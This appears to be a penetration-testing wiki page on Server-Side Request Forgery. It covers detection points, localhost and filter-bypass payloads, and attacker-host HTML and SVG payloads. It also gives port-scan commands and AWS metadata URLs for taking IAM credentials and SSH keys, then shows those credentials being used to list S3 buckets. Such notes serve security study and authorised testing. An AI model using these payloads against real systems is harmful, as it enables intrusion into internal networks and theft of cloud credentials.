SSRF

Theory

Server-Side Request Forgery (SSRF) is a vulnerability in which an attacker can send a controlled, crafted request via a vulnerable application. We can communicate with different services running on different protocols by utilizing URI schemes. Getting a server to issue a request is not a vulnerability in itself, but it becomes one when you can make requests to things you wouldn’t or shouldn’t normally have access to, such as internal networks or internal services.

Articles to read:

Detection:

Webhooks: Check out parameters such as /file=, /path=, /src= to see if the application can send request only to whitelisted applications. Eg: https://hackerone.com/reports/398641
PDF Generators :
- HTML or PDF generators, where a headless browser or similar is used in a privileged network position to generate a preview or PDF.
- Ref: https://docs.google.com/presentation/d/1JdIjHHPsFSgLbaJcHmMkE904jmwPM4xdhEuwhy2ebvo/edit
- Can I upload HTML” and if so, “What happens if that HTML fetches external resources”? Check content-Type : Body :
Document parsers: Check for file upload features. Test file parsers.
- Instead of uploading a file, try sending a URL and see if it downloads the content of the URL. Ref:https://hackerone.com/reports/713
E-mail ID field on sign-up pages.
- user@abc123.burpcollaborator.net
- user@1.2.3.4.xip.io

Payloads

Cheatsheet: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#bypass-localhost-with-

#Basic localhost Payloads
http://127.0.0.1:port
http://localhost:port
https://127.0.0.1:port
https://localhost:port
http://[::]:port
http://0000::1:port
http://[0:0:0:0:0:ffff:127.0.0.1]
http://0/
http://127.1
http://127.0.1
http://localhost/server-status
http://127.0.0.2
http://127.0.0.x
#Decimal & Octal notation
http://2130706433


#White-list bypass. Set-up a server yourdomain.com to return localhost for any x.yourdomain.com DNS request.
[dig blah.yourdomain.com -> Returns A record: localhost. eg: [hackingwithpentesterlab.link]

#Subdomain Domain-filter [Add a '.' to check]
https://url.com?param=http://whitelisteddomain.com./file.txt
https://url.com?param=http://whitelisteddomain.com.yourdomain.com/server-status

#PDF Generators
<html><img sr="http://attacker.com"></html>
#Check content-Type

#File upload
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"> 
<image height="30" width="30" 
xlink:href="https://controlledserver.com/pic.svg" /> 
</svg>

Bypass white-list filters:
- Create a domain that resolves to 127.0.0.1.
- Create a target.myowndomain.com that resolves to 127.0.0.1
- http://127.0.0.1:6868%2fstatus%2f?q=http://<white-listed keyword>
- Use a custom domain and point it to the target's IP.
- https://realurl.com#@evil.com
- https://admin:password@www.realurl.com:80@domain.com
- Identify other open-redirect vulnerabilities.
Bypass black-list filters:
- Decimal & Octal notation.
- URL Encoding.
Blind SSRF
- Use JS to exfil data.

What is xip.io?

xip.io is a magic domain name that provides wildcard DNS for any IP address. Say your LAN IP address is 10.0.0.1.
Eg: http://169.254.169.254.xip.io/latest

      10.0.0.1.xip.io   resolves to   10.0.0.1
  www.10.0.0.1.xip.io   resolves to   10.0.0.1
  mysite.10.0.0.1.xip.io resolves to 10.0.0.1 
  foo.bar.10.0.0.1.xip.io resolves to 10.0.0.1

You can use these domains to access virtual hosts on your development web server from devices on your local network, like iPads, iPhones, and other computers.

Protocols

gopher:// (File Distribution)
dict:// ( dictionary network protocol)
ftp:// (File Transfer Protocol)
file:// (File URI Scheme)
ldap:// ( Lightweight Directory Access Protocol)

Port-scan on Target

-c : Output with colours
-z : Payload
--hl=2 : Remove all responses '2'

wfuzz -c -z range,1-65535 --hl=2 -u http://10.10.10.55:60000/url.php?path=http://localhost:FUZZ

#!/usr/bin/env bash
for port in `seq 1 9999`
do
	echo -e "\n\n[+] Checking Port: "$port"\n"
	curl 'https://api.hackertarget.com/httpheaders/?q=http://'$1':'$port && echo -e "\n"
done

Advanced Attacks

Exploiting SSRF via SMTP : Write-up : https://hackerone.com/reports/392859
DNS Listener: tcpdump -n udp port 53 | grep "abc.domain.com"

Firewall Bypasses

Owning the Cloud Through SSRF

Article: http://ghostlulz.com/ssrf-aws-credentials/
Cloud Metadata:
- Accessible internally through the machine you have access to. [AWS :http://169.254.169.254/]
- Provides details like internal IP, hostname, Secret keys.
https://github.com/andresriancho/enumerate-iam
https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed

#AWS
http://169.254.169.254
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document

Reference:https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html

Elastic Beanstalk

http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role

Then we use the credentials with aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/

PreviousFile Inclusion NextInjection

Last updated 3 years ago